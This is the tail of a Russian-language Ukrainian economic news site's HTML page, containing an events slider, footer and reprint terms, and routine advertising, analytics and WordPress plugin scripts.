onSlideComplete:function(slider){region();},});});</script><p style="margin: 0;
font-size: 13pt;
font-weight: 700;
font-family: arial,verdana,tahoma;
text-align: left;
padding: 10px 32px 10px 35px;" class="head">Афиша<span style="float: right; font-size: 11px; line-height: 18px;">&nbsp;</span></p><ul id="sliderafisha"><li><ul class="tact"><li ><div id="post-4758234" class="postafisha"><span class="region">Киев 06&#160;июня</span><div class="aimg"><a href="https://enovosty.com/kino/full/2905-kinopremera-film-lyudi-iks-temnyj-feniks"><img width="170" height="132" alt="Кинопремьера: фильм «Люди Икс: Темный ..." src="/wp-content/uploads/2019/05/dark_phoenix2.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/2905-kinopremera-film-lyudi-iks-temnyj-feniks">Кинопремьера: фильм «Люди Икс: Темный ...</a></div></div></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div> </br></br><a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="996_149"></div><script>new MTr('996_149', {site:907,format:0});</script><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены.</p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4759202"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <link rel='stylesheet' id='wsl-widget-css' href='https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/css/style.css' type='text/css' media='all' /><script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript'>
var pollsL10n = {"ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","text_wait":"\u0412\u0430\u0448 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435\u2026","text_valid":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0432\u044b\u0431\u0435\u0440\u0438\u0442\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043e\u0442\u0432\u0435\u0442\u0430.","text_multiple":"\u041c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0451\u043d\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u044b\u0431\u0438\u0440\u0430\u0435\u043c\u044b\u0445 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432:","show_loading":"1","show_fading":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/wp-polls/polls.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4759202","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wpembed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "d830c4cc47";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'></div><script>admixerML.fn.push(function () { admixerML.display('admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'); });</script><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script src="https://affiliate.ria.com/js/ria_informer.js?riacode=015d2e7c4ce2cda608aa710275088255" async></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> </body></html>